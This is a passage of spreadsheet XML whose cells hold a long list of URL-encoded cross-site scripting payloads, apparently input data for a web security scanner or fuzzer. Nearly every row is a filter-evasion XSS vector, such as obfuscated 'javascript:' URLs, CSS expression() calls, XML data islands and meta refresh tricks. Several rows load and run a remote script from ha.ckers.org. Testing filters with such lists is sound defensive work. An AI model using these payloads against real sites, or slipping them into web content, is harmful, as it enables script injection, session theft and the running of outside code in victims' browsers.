        <v>%3C%3BSTYLE%3E%3B%40im%5Cport%27%3B%5Cja%5Cvasc%5Cript%3Aalert%28%22%3BXSS%22%3B%29%27%3B%3B%3C%3B%2FSTYLE%3E%3B</v>
      </c>
    </row>
    <row r="2409">
      <c r="A2409" s="3" t="s">
        <v>1428</v>
      </c>
      <c r="B2409" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bjav%26%23x09%3Bascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2410">
      <c r="A2410" s="3" t="s">
        <v>1429</v>
      </c>
      <c r="B2410" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bjav%26%3B%23x09%3Bascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2411">
      <c r="A2411" s="3" t="s">
        <v>1430</v>
      </c>
      <c r="B2411" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bjav%26%3B%23x0A%3Bascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2412">
      <c r="A2412" s="3" t="s">
        <v>1431</v>
      </c>
      <c r="B2412" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bjav%26%3B%23x0D%3Bascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2413">
      <c r="A2413" s="3" t="s">
        <v>1432</v>
      </c>
      <c r="B2413" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%26%23x0D%3BSRC%26%23x0D%3B%3D%26%23x0D%3B%22%3B%26%23x0D%3Bj%26%23x0D%3Ba%26%23x0D%3Bv%26%23x0D%3Ba%26%23x0D%3Bs%26%23x0D%3Bc%26%23x0D%3Br%26%23x0D%3Bi%26%23x0D%3Bp%26%23x0D%3Bt%26%23x0D%3B%3A%26%23x0D%3Ba%26%23x0D%3Bl%26%23x0D%3Be%26%23x0D%3Br%26%23x0D%3Bt%26%23x0D%3B%26%23x0D%3B%27%3B%26%23x0D%3BX%26%23x0D%3BS%26%23x0D%3BS%26%23x0D%3B%27%3B%26%23x0D%3B%29%26%23x0D%3B%22%3B%26%23x0D%3B%3E%3B%26%23x0D%3B</v>
      </c>
    </row>
    <row r="2414">
      <c r="A2414" s="3" t="s">
        <v>1433</v>
      </c>
      <c r="B2414" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27%3Bprint%20%22%3B%3C%3BIM%20SRC%3Djava%5C0script%3Aalert%28%22%3BXSS%22%3B%29%3E%22%3B%3B%27%3B%3E%3B%20out</v>
      </c>
    </row>
    <row r="2415">
      <c r="A2415" s="3" t="s">
        <v>1434</v>
      </c>
      <c r="B2415" s="4" t="str">
        <f t="shared" si="1"/>
        <v>perl%20-e%20%27%3Bprint%20%22%3B%26%3B%3C%3BSCR%5C0IPT%3E%3Balert%28%22%3BXSS%22%3B%29%3C%3B%2FSCR%5C0IPT%3E%3B%22%3B%3B%27%3B%20%3E%3B%20out</v>
      </c>
    </row>
    <row r="2416">
      <c r="A2416" s="3" t="s">
        <v>1435</v>
      </c>
      <c r="B2416" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3B%20%26%3B%2314%3B%20%20javascript%3Aalert%28%27%3BXSS%27%3B%29%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2417">
      <c r="A2417" s="3" t="s">
        <v>1436</v>
      </c>
      <c r="B2417" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%2FXSS%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2418">
      <c r="A2418" s="3" t="s">
        <v>1437</v>
      </c>
      <c r="B2418" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BBODY%20onload%21%23%24%25%26%3B%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22%3BXSS%22%3B%29%3E%3B</v>
      </c>
    </row>
    <row r="2419">
      <c r="A2419" s="3" t="s">
        <v>1438</v>
      </c>
      <c r="B2419" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js</v>
      </c>
    </row>
    <row r="2420">
      <c r="A2420" s="3" t="s">
        <v>1439</v>
      </c>
      <c r="B2420" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20SRC%3D%2F%2Fha.ckers.org%2F.j%3E%3B</v>
      </c>
    </row>
    <row r="2421">
      <c r="A2421" s="3" t="s">
        <v>1440</v>
      </c>
      <c r="B2421" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20SRC%3D%22%3Bjavascript%3Aalert%28%27%3BXSS%27%3B%29%22%3B</v>
      </c>
    </row>
    <row r="2422">
      <c r="A2422" s="3" t="s">
        <v>1441</v>
      </c>
      <c r="B2422" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIFRAME%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%3C%3B</v>
      </c>
    </row>
    <row r="2423">
      <c r="A2423" s="3" t="s">
        <v>1442</v>
      </c>
      <c r="B2423" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3B%3C%3BSCRIPT%3E%3Balert%28%22%3BXSS%22%3B%29%3B%2F%2F%3C%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2424">
      <c r="A2424" s="3" t="s">
        <v>1443</v>
      </c>
      <c r="B2424" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BIMG%20%22%3B%22%3B%22%3B%3E%3B%3C%3BSCRIPT%3E%3Balert%28%22%3BXSS%22%3B%29%3C%3B%2FSCRIPT%3E%3B%22%3B%3E%3B</v>
      </c>
    </row>
    <row r="2425">
      <c r="A2425" s="3" t="s">
        <v>1444</v>
      </c>
      <c r="B2425" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%3E%3Ba%3D%2FXSS%2F</v>
      </c>
    </row>
    <row r="2426">
      <c r="A2426" s="3" t="s">
        <v>1445</v>
      </c>
      <c r="B2426" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20a%3D%22%3B%3E%3B%22%3B%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2427">
      <c r="A2427" s="3" t="s">
        <v>1446</v>
      </c>
      <c r="B2427" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20%3D%22%3Bblah%22%3B%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2428">
      <c r="A2428" s="3" t="s">
        <v>1447</v>
      </c>
      <c r="B2428" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20a%3D%22%3Bblah%22%3B%20%27%3B%27%3B%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2429">
      <c r="A2429" s="3" t="s">
        <v>1448</v>
      </c>
      <c r="B2429" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20%22%3Ba%3D%27%3B%3E%3B%27%3B%22%3B%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2430">
      <c r="A2430" s="3" t="s">
        <v>1449</v>
      </c>
      <c r="B2430" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20a%3D%60%3E%3B%60%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2431">
      <c r="A2431" s="3" t="s">
        <v>1450</v>
      </c>
      <c r="B2431" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%3E%3Bdocument.write%28%22%3B%3C%3BSCRI%22%3B%29%3B%3C%3B%2FSCRIPT%3E%3BPT%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2432">
      <c r="A2432" s="3" t="s">
        <v>1451</v>
      </c>
      <c r="B2432" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BSCRIPT%20a%3D%22%3B%3E%27%3B%3E%22%3B%20SRC%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%2Fxss.js%22%3B%3E%3B%3C%3B%2FSCRIPT%3E%3B</v>
      </c>
    </row>
    <row r="2433">
      <c r="A2433" s="3" t="s">
        <v>1452</v>
      </c>
      <c r="B2433" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2F66.102.7.147%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2434">
      <c r="A2434" s="3" t="s">
        <v>1453</v>
      </c>
      <c r="B2434" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2F%2577%2577%2577%252E%2567%256F%256F%2567%256C%2565%252E%2563%256F%256D%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2435">
      <c r="A2435" s="3" t="s">
        <v>1454</v>
      </c>
      <c r="B2435" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2F1113982867%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2436">
      <c r="A2436" s="3" t="s">
        <v>1455</v>
      </c>
      <c r="B2436" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2F0x42.0x0000066.0x7.0x93%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2437">
      <c r="A2437" s="3" t="s">
        <v>1456</v>
      </c>
      <c r="B2437" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2F0102.0146.0007.00000223%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2438">
      <c r="A2438" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="B2438" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bh%26%23x0A%3Btt%26%2309%3Bp%3A%2F%2F6%26%3B%2309%3B6.000146.0x7.147%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2439">
      <c r="A2439" s="3" t="s">
        <v>1458</v>
      </c>
      <c r="B2439" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3B%2F%2Fwww.google.com%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2440">
      <c r="A2440" s="3" t="s">
        <v>1459</v>
      </c>
      <c r="B2440" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3B%2F%2Fgoogle%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2441">
      <c r="A2441" s="3" t="s">
        <v>1460</v>
      </c>
      <c r="B2441" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2Fha.ckers.org%40google%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2442">
      <c r="A2442" s="3" t="s">
        <v>1461</v>
      </c>
      <c r="B2442" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2Fgoogle%3Aha.ckers.org%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2443">
      <c r="A2443" s="3" t="s">
        <v>1462</v>
      </c>
      <c r="B2443" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2Fgoogle.com%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2444">
      <c r="A2444" s="3" t="s">
        <v>1463</v>
      </c>
      <c r="B2444" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2Fwww.google.com.%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2445">
      <c r="A2445" s="3" t="s">
        <v>1464</v>
      </c>
      <c r="B2445" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bjavascript%3Adocument.location%3D%27%3Bhttp%3A%2F%2Fwww.google.com%2F%27%3B%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2446">
      <c r="A2446" s="3" t="s">
        <v>1465</v>
      </c>
      <c r="B2446" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3BA%20HREF%3D%22%3Bhttp%3A%2F%2Fwww.gohttp%3A%2F%2Fwww.google.com%2Fogle.com%2F%22%3B%3E%3BXSS%3C%3B%2FA%3E%3B</v>
      </c>
    </row>
    <row r="2447">
      <c r="A2447" s="3" t="s">
        <v>1252</v>
      </c>
      <c r="B2447" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2448">
      <c r="A2448" s="3" t="s">
        <v>1253</v>
      </c>
      <c r="B2448" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22jav%20ascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2449">
      <c r="A2449" s="3" t="s">
        <v>1254</v>
      </c>
      <c r="B2449" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2450">
      <c r="A2450" s="3" t="s">
        <v>1255</v>
      </c>
      <c r="B2450" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22%20%26%2314%3B%20javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2451">
      <c r="A2451" s="3" t="s">
        <v>1256</v>
      </c>
      <c r="B2451" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Ddocument.vulnerable%3Dtrue%3B%3E</v>
      </c>
    </row>
    <row r="2452">
      <c r="A2452" s="3" t="s">
        <v>1257</v>
      </c>
      <c r="B2452" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="2453">
      <c r="A2453" s="3" t="s">
        <v>1258</v>
      </c>
      <c r="B2453" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20%3CB%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2454">
      <c r="A2454" s="3" t="s">
        <v>1259</v>
      </c>
      <c r="B2454" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22</v>
      </c>
    </row>
    <row r="2455">
      <c r="A2455" s="3" t="s">
        <v>1260</v>
      </c>
      <c r="B2455" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%20%3C</v>
      </c>
    </row>
    <row r="2456">
      <c r="A2456" s="3" t="s">
        <v>1261</v>
      </c>
      <c r="B2456" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ea%3D%2FXSS%2F%5Cndocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2457">
      <c r="A2457" s="3" t="s">
        <v>1262</v>
      </c>
      <c r="B2457" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%22%3Bdocument.vulnerable%3Dtrue%3B%3B%2F%2F</v>
      </c>
    </row>
    <row r="2458">
      <c r="A2458" s="3" t="s">
        <v>1263</v>
      </c>
      <c r="B2458" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Ftitle%3E%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="2459">
      <c r="A2459" s="3" t="s">
        <v>1264</v>
      </c>
      <c r="B2459" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2460">
      <c r="A2460" s="3" t="s">
        <v>1265</v>
      </c>
      <c r="B2460" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20BACKGROUND%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2461">
      <c r="A2461" s="3" t="s">
        <v>1266</v>
      </c>
      <c r="B2461" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20ONLOAD%3Ddocument.vulnerable%3Dtrue%3B%3E</v>
      </c>
    </row>
    <row r="2462">
      <c r="A2462" s="3" t="s">
        <v>1267</v>
      </c>
      <c r="B2462" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20DYNSRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2463">
      <c r="A2463" s="3" t="s">
        <v>1268</v>
      </c>
      <c r="B2463" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20LOWSRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2464">
      <c r="A2464" s="3" t="s">
        <v>1269</v>
      </c>
      <c r="B2464" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbgsound%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2465">
      <c r="A2465" s="3" t="s">
        <v>1270</v>
      </c>
      <c r="B2465" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbr%20SIZE%3D%22%26%7Bdocument.vulnerable%3Dtrue%7D%22%3E</v>
      </c>
    </row>
    <row r="2466">
      <c r="A2466" s="3" t="s">
        <v>1271</v>
      </c>
      <c r="B2466" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLAYER%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E%3C%2FLAYER%3E</v>
      </c>
    </row>
    <row r="2467">
      <c r="A2467" s="3" t="s">
        <v>1272</v>
      </c>
      <c r="B2467" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Clink%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2468">
      <c r="A2468" s="3" t="s">
        <v>1273</v>
      </c>
      <c r="B2468" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%29%3B%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS</v>
      </c>
    </row>
    <row r="2469">
      <c r="A2469" s="3" t="s">
        <v>1274</v>
      </c>
      <c r="B2469" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20SRC%3D%27vbscript%3Adocument.vulnerable%3Dtrue%3B%27%3E</v>
      </c>
    </row>
    <row r="2470">
      <c r="A2470" s="3" t="s">
        <v>1275</v>
      </c>
      <c r="B2470" s="4" t="str">
        <f t="shared" si="1"/>
        <v>1script3document.vulnerable%3Dtrue%3B1%2Fscript3</v>
      </c>
    </row>
    <row r="2471">
      <c r="A2471" s="3" t="s">
        <v>1276</v>
      </c>
      <c r="B2471" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3Burl%3Djavascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2472">
      <c r="A2472" s="3" t="s">
        <v>1277</v>
      </c>
      <c r="B2472" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmeta%20HTTP-EQUIV%3D%22refresh%22%20CONTENT%3D%220%3B%20URL%3Dhttp%3A%2F%2F%3BURL%3Djavascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2473">
      <c r="A2473" s="3" t="s">
        <v>1278</v>
      </c>
      <c r="B2473" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIFRAME%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="2474">
      <c r="A2474" s="3" t="s">
        <v>1279</v>
      </c>
      <c r="B2474" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CFRAMESET%3E%3CFRAME%20SRC%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E%3C%2Fframeset%3E</v>
      </c>
    </row>
    <row r="2475">
      <c r="A2475" s="3" t="s">
        <v>1280</v>
      </c>
      <c r="B2475" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctable%20BACKGROUND%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2476">
      <c r="A2476" s="3" t="s">
        <v>1281</v>
      </c>
      <c r="B2476" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctable%3E%3CTD%20BACKGROUND%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%22%3E</v>
      </c>
    </row>
    <row r="2477">
      <c r="A2477" s="3" t="s">
        <v>1282</v>
      </c>
      <c r="B2477" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20STYLE%3D%22background-image%3A%20url%28javascript%3Adocument.vulnerable%3Dtrue%3B%29%22%3E</v>
      </c>
    </row>
    <row r="2478">
      <c r="A2478" s="3" t="s">
        <v>1283</v>
      </c>
      <c r="B2478" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20STYLE%3D%22background-image%3A%20url%28%26%231%3Bjavascript%3Adocument.vulnerable%3Dtrue%3B%29%22%3E</v>
      </c>
    </row>
    <row r="2479">
      <c r="A2479" s="3" t="s">
        <v>1284</v>
      </c>
      <c r="B2479" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cdiv%20STYLE%3D%22width%3A%20expression%28document.vulnerable%3Dtrue%29%3B%22%3E</v>
      </c>
    </row>
    <row r="2480">
      <c r="A2480" s="3" t="s">
        <v>1285</v>
      </c>
      <c r="B2480" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Adocument.vulnerable%3Dtrue%27%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2481">
      <c r="A2481" s="3" t="s">
        <v>1286</v>
      </c>
      <c r="B2481" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28document.vulnerable%3Dtrue%29%22%3E</v>
      </c>
    </row>
    <row r="2482">
      <c r="A2482" s="3" t="s">
        <v>1287</v>
      </c>
      <c r="B2482" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28document.vulnerable%3Dtrue%29%22%3E</v>
      </c>
    </row>
    <row r="2483">
      <c r="A2483" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="B2483" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%3CA%20STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3Bxss%3Aex%2F%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28document.vulnerable%3Dtrue%29%27%3E</v>
      </c>
    </row>
    <row r="2484">
      <c r="A2484" s="3" t="s">
        <v>1289</v>
      </c>
      <c r="B2484" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20TYPE%3D%22text%2Fjavascript%22%3Edocument.vulnerable%3Dtrue%3B%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2485">
      <c r="A2485" s="3" t="s">
        <v>1290</v>
      </c>
      <c r="B2485" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E.XSS%7Bbackground-image%3Aurl%28%22javascript%3Adocument.vulnerable%3Dtrue%22%29%3B%7D%3C%2FSTYLE%3E%3CA%20CLASS%3DXSS%3E%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="2486">
      <c r="A2486" s="3" t="s">
        <v>1291</v>
      </c>
      <c r="B2486" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%20type%3D%22text%2Fcss%22%3EBODY%7Bbackground%3Aurl%28%22javascript%3Adocument.vulnerable%3Dtrue%22%29%7D%3C%2Fstyle%3E</v>
      </c>
    </row>
    <row r="2487">
      <c r="A2487" s="3" t="s">
        <v>1292</v>
      </c>
      <c r="B2487" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%5Bif%20gte%20IE%204%5D%3E%3CSCRIPT%3Edocument.vulnerable%3Dtrue%3B%3C%2FSCRIPT%3E%3C%21%5Bendif%5D--%3E</v>
      </c>
    </row>
    <row r="2488">
      <c r="A2488" s="3" t="s">
        <v>1293</v>
      </c>
      <c r="B2488" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbase%20HREF%3D%22javascript%3Adocument.vulnerable%3Dtrue%3B%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="2489">
      <c r="A2489" s="3" t="s">
        <v>1294</v>
      </c>
      <c r="B2489" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3COBJECT%20classid%3Dclsid%3Aae24fdae-03c6-11d1-8b76-0080c744f389%3E%3Cparam%20name%3Durl%20value%3Djavascript%3Adocument.vulnerable%3Dtrue%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="2490">
      <c r="A2490" s="3" t="s">
        <v>1295</v>
      </c>
      <c r="B2490" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5Bcript%3Adocument.vulnerable%3Dtrue%3B%22%3E%5D%5D%3C%2FC%3E%3C%2FX%3E%3C%2Fxml%3E%3CSPAN%20DATASRC%3D%23I%20DATAFLD%3DC%20DATAFORMATAS%3DHTML%3E%3C%2Fspan%3E</v>
      </c>
    </row>
    <row r="2491">
      <c r="A2491" s="3" t="s">
        <v>1296</v>
      </c>
      <c r="B2491" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXML%20ID%3D%22xss%22%3E%3CI%3E%3CB%3E%3CIMG%20SRC%3D%22javas%3C%21--%20--%3Ecript%3Adocument.vulnerable%3Dtrue%22%3E%3C%2FB%3E%3C%2FI%3E%3C%2FXML%3E%3CSPAN%20DATASRC%3D%22%23xss%22%20DATAFLD%3D%22B%22%20DATAFORMATAS%3D%22HTML%22%3E%3C%2Fspan%3E</v>
      </c>
    </row>
    <row r="2492">
      <c r="A2492" s="3" t="s">
        <v>1297</v>
      </c>
      <c r="B2492" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%3E%3CBODY%3E%3C%3Fxml%3Anamespace%20prefix%3D%22t%22%20ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E%3C%3Fimport%20namespace%3D%22t%22%20implementation%3D%22%23default%23time2%22%3E%3Ct%3Aset%20attributeName%3D%22innerHTML%22%20to%3D%22XSS%3CSCRIPT%20DEFER%3Edocument.vulnerable%3Dtrue%3C%2FSCRIPT%3E%22%3E%3C%2FBODY%3E%3C%2Fhtml%3E</v>
      </c>
    </row>
    <row r="2493">
      <c r="A2493" s="3" t="s">
        <v>1298</v>
      </c>
      <c r="B2493" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20echo%28%27%3CSCR%29%27%3Becho%28%27IPT%3Edocument.vulnerable%3Dtrue%3C%2FSCRIPT%3E%27%29%3B%20%3F%3E</v>
      </c>
    </row>
    <row r="2494">
